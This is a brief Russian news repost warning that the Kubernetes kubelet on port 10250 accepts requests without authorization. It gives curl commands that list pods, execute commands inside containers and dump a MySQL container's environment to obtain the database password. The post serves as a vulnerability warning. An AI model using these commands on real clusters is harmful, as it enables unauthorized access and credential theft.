Предостережение для пользователей Kubernetes
Сервис kubelet, с которым тесно общается apiserver, слушает порт 10250. Этот порт хоть и использует сертификаты, но лишь для шифрования канала, никакой авторизации на нём нет.
Об этой проблеме известно давно, но почему-то никто не считает её серьезной. Ссылки на обсуждения:
https://github.com/kubernetes/kubernetes/issues/3168
https://github.com/kubernetes/kubernetes/issues/7965
https://github.com/kubernetes/kubernetes/issues/11816
Что с этим можно сделать? Правтически всё. Без регистрации и sms.
Получить список всех pod'ов:
$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool
Выполнить команду внутри контейнера? Запросто:
$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"
Получить пароль на базу данных? Проще простого:
$ curl -k -XPOST "https://k8s-node-1:10250/run/default/mysql-epg0f/mysql" -d 'cmd=env'
Вытащить из неё данные тоже не составит труда.
Источник: Хабрахабр
Похожие новости
- Половина работающих в найме россиян хотят уйти в собственный бизнес в ближайшие два года
- «Сделано в России»: цифровые экосистемы МАЕР получили сертификат РЭЦ
- Бренд как медиа: что меняется, когда компания становится источником смыслов
- Foreman в изоляции: как мы построили отказоустойчивую и безопасную систему для массового деплоя ОС
- Пароли не там, где вы их оставили. Как работает DOM Clickjacking
- Релиз ChameleonLab под Windows и macOS: История о невидимых данных, «зомби»-потоках и секретной игре
- Как мы в Selectel нашли уязвимость в Mailcow, или немного о безопасности в open source
- DevSecOps-консоль для контроля уязвимостей в коде: автоматизация, аналитика и AI-ассистент
- Реальные атаки, виртуальный полигон: Standoff Defend — новый продукт для blue team
- AI-креативы в мобайле 2025: персонализация и «живой» контент